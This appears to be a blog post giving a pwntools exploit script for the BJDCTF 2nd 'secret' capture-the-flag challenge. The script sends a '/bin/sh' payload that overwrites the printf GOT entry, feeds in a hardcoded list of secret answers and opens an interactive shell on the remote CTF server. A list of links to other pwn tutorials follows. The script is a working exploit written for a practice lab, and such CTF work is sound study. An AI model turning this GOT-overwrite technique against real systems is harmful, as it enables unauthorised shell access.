BJDCTF 2nd secret

2023-05-12 13:21:57

from pwn import *

p = remote('node3.buuoj.cn',27231)

elf = ELF("./secret")
p.recvuntil("# What's your name? _")
payload = '/bin/sh\x00\x00\x00\x00\x00\x00\x00\x00\x00' + p32(elf.got['printf'])

p.sendline(payload)
 
answer = [0x476B,0x2D38,0x4540,0x3E77,0x3162,0x3F7D,0x357A,0x3CF5,0x2F9E,0x41EA,0x48D8,0x2763,0x474C,0x3809,0x2E63]

for i in answer:
    p.recvuntil("#           Secret: _")
    log.success(i)
    p.sendline(str(i))

p.recvuntil("#           Secret: _")
p.sendline('1')
p.interactive()

BJDCTF 2nd secret

繼續閱讀

使用Docker進行Pwn題環境部署使用Docker進行Pwn題環境部署Pwn部署架構國賽Pwn之一

攻防世界PWN之dubblesort題解dubblesort

how2heap（4）：tcache_house_of_spirit 2.31tcache_house_of_spirit 2.31

【pwn基礎】mallopt

PWN學習總結（三）—— BROP

pwn學習總結（五） —— 堆溢出經典題型整理fastbin + 棧溢出fastbin + 函數構造fastbin + 堆執行fastbin + malloc_hook

pwn 暑假複習一

pwn1及ROP總結

pwn之pwn-1001.題目2.思路

（補題）HITCON 2018 PWN baby_tcache超詳細講解前言HITCON 2018 PWN baby_tcache

數組下标越界

PWN學習記錄

WMCTF 2021 pwn Azly複現

how2heap（5）：tcache_poisoning 2.31tcache_poisoning 2.31

【BUUCTF】bjdctf_2020_babystack2

CTF之堆溢出-unlink原理探究